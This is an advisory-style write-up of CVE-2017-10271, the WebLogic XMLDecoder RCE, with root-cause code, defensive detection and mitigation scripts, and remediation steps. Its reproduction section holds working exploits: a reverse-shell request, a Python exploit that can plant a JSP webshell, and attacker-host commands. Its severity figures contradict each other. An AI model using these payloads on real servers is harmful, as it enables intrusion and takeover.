1. Vulnerability Overview
1.1 Background
In October 2017, Oracle released its quarterly Critical Patch Update, which included the fix for CVE-2017-10271. The vulnerability is a remote code execution flaw in the WLS Security component of WebLogic Server. It can be triggered over both the T3 and HTTP protocols, is simple to exploit, and requires no authentication.
The flaw is a bypass of the patch for CVE-2015-4852: an attacker abuses WebLogic's built-in use of the XMLDecoder component to carry out a deserialization attack, sidestepping Oracle's earlier deserialization protections.
1.2 Summary (CVE ID, severity, vulnerability type, disclosure date, etc.)

| Item | Value |
|---|---|
| CVE ID | CVE-2017-10271 |
| Severity | HIGH / 7.5 |
| Vulnerability type | XMLDecoder deserialization remote code execution |
| Disclosure date | 2017-10-19 |
| Affected component | Oracle WebLogic Server (major) |

- CVE ID: CVE-2017-10271
- Severity: Critical
- CVSS score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Vulnerability type: XMLDecoder deserialization remote code execution
- Attack complexity: low
- Privileges required: none (no authentication)
- User interaction: none

Supplementary verification data: published 2017-10-19; NVD score 7.5 (HIGH); CWE: CWE-306.
2. Affected Scope
2.1 Affected versions
- Oracle WebLogic Server 10.3.6.0
- Oracle WebLogic Server 12.1.3.0
- Oracle WebLogic Server 12.2.1.1
- Oracle WebLogic Server 12.2.1.2
2.2 Unaffected versions
- Oracle WebLogic Server 10.3.6.0 with the October 2017 CPU patch or later
- Oracle WebLogic Server 12.1.3.0 with the October 2017 CPU patch or later
- Oracle WebLogic Server 12.2.1.3 and later
2.3 Trigger conditions (specific modules, configuration, runtime environment, etc.)
- The target WebLogic Server exposes its HTTP listen port (7001 by default)
- The target has the WLS Web Services (wls-wsat) component enabled
- The attacker can send HTTP requests to the target server
3. Vulnerability Details and Root Cause
3.1 Trigger mechanism
The WLS Security component of WebLogic Server uses the JDK's built-in XMLDecoder class to parse XML carried in SOAP messages. XMLDecoder turns XML into Java objects, but it does so by instantiating whatever classes and invoking whatever methods the XML names, so feeding it untrusted input is, by design, arbitrary code execution.
Attack path:
```text
HTTP request → /wls-wsat/CoordinatorPortType → SOAP message parsing
→ XMLDecoder.readObject() → executes the Java calls described in the XML
```
3.2 Source-level root cause (source vs. patch comparison)
Vulnerable entry point: SOAP handling in the wls-wsat component
```java
// weblogic.wsee.jaxws.persistence.PersistentContext
import java.beans.XMLDecoder;
import java.io.InputStream;

public class PersistentContext {
    public void readXML(InputStream is) {
        XMLDecoder decoder = new XMLDecoder(is); // dangerous: the stream is attacker-controlled
        Object obj = decoder.readObject();       // deserialization executes the XML's instructions
        decoder.close();
    }
}
```
The dangerous property of XMLDecoder is that it can execute arbitrary Java code. For example, calling readObject() on the following XML launches calc.exe:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_80" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime">
    <method name="getRuntime">
      <method name="exec">
        <string>calc.exe</string>
      </method>
    </method>
  </object>
</java>
```
WebLogic's processing flow:
```java
// weblogic.wsee.jaxws.WorkContextServerHandler
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.util.Iterator;
import javax.xml.soap.SOAPElement;
import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPHeader;
import javax.xml.soap.SOAPMessage;
import javax.xml.ws.handler.MessageContext;
import javax.xml.ws.handler.soap.SOAPMessageContext;

public class WorkContextServerHandler {
    public boolean handleMessage(MessageContext ctx) {
        SOAPMessageContext smc = (SOAPMessageContext) ctx;
        SOAPMessage msg = smc.getMessage();
        try {
            // Fetch the SOAP header
            SOAPHeader header = msg.getSOAPHeader();
            // Look for the WorkContext element
            Iterator<?> it = header.getChildElements();
            while (it.hasNext()) {
                Object child = it.next();
                if (!(child instanceof SOAPElement)) continue; // skip text nodes
                SOAPElement el = (SOAPElement) child;
                if ("WorkContext".equals(el.getLocalName())) {
                    // Parsed with XMLDecoder: this is the vulnerable point
                    XMLDecoder decoder = new XMLDecoder(
                        new ByteArrayInputStream(el.getValue().getBytes())
                    );
                    decoder.readObject(); // executes the attacker's instructions
                    decoder.close();
                }
            }
        } catch (SOAPException e) {
            throw new RuntimeException(e);
        }
        return true;
    }
}
```
Endpoints that trigger the vulnerability:
```text
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
```
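As an added defensive example (not code from this write-up, from Oracle, or from WebLogic), the following Python inspector flags the construct every PoC on this page depends on: XMLDecoder `<object>`, `<method>` and `<void method=...>` instructions inside a WorkContext header posted to one of the endpoints listed above. The endpoint list, namespaces and class names come from the page; the rule itself and the two sample requests are constructed.

```python
import xml.etree.ElementTree as ET

# Endpoint list and namespaces come from this write-up; the rule itself is constructed.
WSAT_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11", "/wls-wsat/RegistrationRequesterPortType11",
}
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
DANGEROUS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder"}  # used by the PoCs above

def inspect_request(path, body):
    """Return a list of findings for one HTTP request (empty list = nothing suspicious)."""
    findings = []
    if path.split("?", 1)[0] not in WSAT_ENDPOINTS:
        return findings                      # not a WS-AT endpoint: out of scope here
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable XML sent to wls-wsat endpoint"]
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return findings
    # A WorkContext header carrying XMLDecoder object/method instructions is an attack.
    for ctx in header.iter(f"{{{WORK_NS}}}WorkContext"):
        for el in ctx.iter():
            tag = el.tag.split("}")[-1]      # drop the namespace, if any
            cls = el.get("class", "")
            if tag == "object":
                findings.append(f"XMLDecoder <object class='{cls}'> in WorkContext")
            if tag in ("method", "void") and (el.get("name") or el.get("method")):
                findings.append(f"XMLDecoder call via <{tag}> in WorkContext")
            if cls in DANGEROUS_CLASSES:
                findings.append(f"dangerous class {cls} in WorkContext")
    return findings

# Constructed samples: one shaped like the PoC above (harmless command), one benign.
MALICIOUS = ("/wls-wsat/CoordinatorPortType", f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}">
<soapenv:Header><work:WorkContext xmlns:work="{WORK_NS}"><java>
<object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">
<void index="0"><string>whoami</string></void></array><void method="start"/></object>
</java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>""")
BENIGN = ("/wls-wsat/CoordinatorPortType", f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}">
<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>""")

if __name__ == "__main__":
    for path, body in (MALICIOUS, BENIGN):
        print(path, inspect_request(path, body) or "clean")
```

The same check works on request bodies replayed from a capture, since only the path and body are needed.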
4. Reproduction (optional)
4.1 Environment setup
Docker environment (recommended):
```bash
# Use the vulhub environment
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
# Start the environment
docker-compose up -d
# Check the service
docker-compose ps
curl -I http://localhost:7001/console
```
Manual environment:
```bash
# Download WebLogic 12.2.1.2
wget [official Oracle download link]
# Install and create a domain
java -jar fmw_12.2.1.2.0_wls.jar -silent -responseFile response_file.txt
# Start the server
cd /root/Oracle/Middleware/user_projects/domains/base_domain
./startWebLogic.sh
```
4.2 PoC demonstration and test procedure
HTTP request PoC (reverse shell):
```http
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.100:7001
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64)
Connection: close
Content-Type: text/xml
Content-Length: 750

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/192.168.1.200/4444 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
Automated Python PoC:
```python
#!/usr/bin/env python3
# CVE-2017-10271 WebLogic XMLDecoder RCE PoC
import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(target, command):
    """
    Send a malicious SOAP request that executes a command on the target.
    """
    url = f"{target}/wls-wsat/CoordinatorPortType"
    payload = f'''<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:wsa="http://www.w3.org/2005/08/addressing"
    xmlns:asy="http://www.bea.com/async/ResponseService">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>{command}</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>'''
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.post(url, data=payload, headers=headers,
                                 verify=False, timeout=10)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        if response.status_code == 500:
            print("[+] Payload likely executed!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    return False


def write_webshell(target, shell_path):
    """
    Write a WebShell to the target server.
    """
    shell_content = """<%
if("password".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
}
%>"""
    command = f"echo '{shell_content}' > {shell_path}"
    return exploit(target, command)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 exploit.py <target_url> <command>")
        print("Example: python3 exploit.py http://192.168.1.100:7001 'id'")
        sys.exit(1)
    target = sys.argv[1]
    command = sys.argv[2]
    print(f"[*] Target: {target}")
    print(f"[*] Command: {command}")
    exploit(target, command)
```
Windows PoC:
```http
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.100:7001
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>cmd.exe</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>whoami > C:\\temp\\pwned.txt</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
Confirming the vulnerability:
```bash
# DNS out-of-band test
python3 exploit.py http://192.168.1.100:7001 "nslookup test.attacker.com"
# Listen for the reverse shell
nc -lvnp 4444
# Send the reverse shell payload
python3 exploit.py http://192.168.1.100:7001 "bash -i >& /dev/tcp/192.168.1.200/4444 0>&1"
```
5. Remediation and Mitigation
5.1 Official upgrade guidance
- Apply the Oracle CPU patch immediately: the October 2017 Critical Patch Update (CPU)
- Upgrade to a fixed version: WebLogic Server 12.2.1.3 or later
- Official patch download: https://support.oracle.com/rs?type=patch&id=26919434
5.2 Temporary mitigations (configuration changes, disabling modules, WAF rules, etc.)
Option 1: remove the wls-wsat component (most effective)
```bash
cd /root/Oracle/Middleware/wlserver/server/lib
rm -rf wls-wsat.war
cd /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal
rm -rf wls-wsat
# Restart WebLogic (the stop/start scripts live in the domain's bin directory)
cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
./stopWebLogic.sh && ./startWebLogic.sh
```
Option 2: restrict access to the path
```nginx
# Nginx reverse proxy configuration
location ~* ^/wls-wsat/ {
    deny all;
    return 403;
}
```
Or use a WebLogic connection filter, added to config.xml:
```xml
<ConnectionFilter>
  <ConnectionFilterRule>
    <TargetAddress>*</TargetAddress>
    <TargetUri>/wls-wsat/*</TargetUri>
    <Action>DENY</Action>
  </ConnectionFilterRule>
</ConnectionFilter>
```
Option 3: enable access control
```xml
<!-- web.xml: add a security constraint -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>WLS-WSAT</web-resource-name>
    <url-pattern>/wls-wsat/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>Admin</role-name>
  </auth-constraint>
</security-constraint>
```
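Whichever option is applied, it has to cover all eight endpoints from section 3, including the `...11` variants. The checker below is an added example (not part of this write-up or of Oracle's tooling) that probes each one with a plain GET and reports any that still answer with something other than 401, 403 or 404; `http_status` is a hypothetical helper, and `check_mitigation` takes an injectable status function so it can be exercised without a live server.

```python
import urllib.error
import urllib.request

# Endpoint list from this write-up. After Option 1, 2 or 3, every one of them should be
# unreachable; anything other than 401/403/404 (e.g. 200, or a 302 to a login page) is
# reported as exposed so it gets looked at.
WSAT_ENDPOINTS = [
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11", "/wls-wsat/RegistrationRequesterPortType11",
]
# 404: wls-wsat removed; 403: proxy/filter deny; 401: web.xml constraint challenged us.
BLOCKED_STATUSES = {401, 403, 404}


def http_status(url, timeout=5):
    """Hypothetical helper: plain GET with no body, returning the HTTP status code."""
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code          # 401/403/404 arrive as HTTPError; keep the code


def check_mitigation(base_url, status_of=http_status):
    """Probe every endpoint; return (still_exposed, {endpoint: status})."""
    base = base_url.rstrip("/")
    report = {ep: status_of(base + ep) for ep in WSAT_ENDPOINTS}
    exposed = [ep for ep, code in report.items() if code not in BLOCKED_STATUSES]
    return exposed, report


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:7001"
    exposed, report = check_mitigation(target)
    for ep, code in report.items():
        print(f"{code}  {ep}")
    print("EXPOSED:", exposed) if exposed else print("OK: all wls-wsat endpoints blocked")
```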
6. References
6.1 Official security advisories
- Oracle Critical Patch Update October 2017: https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
- NVD CVE-2017-10271: https://nvd.nist.gov/vuln/detail/CVE-2017-10271
6.2 Other technical references
- CVE-2017-10271 analysis (Exploit-DB): https://www.exploit-db.com/exploits/43458/
- WebLogic XMLDecoder vulnerability deep dive (FreeBuf): https://www.freebuf.com/vuls/148794.html
- Oracle WebLogic patch bypass analysis (Seebug): https://paper.seebug.org/398/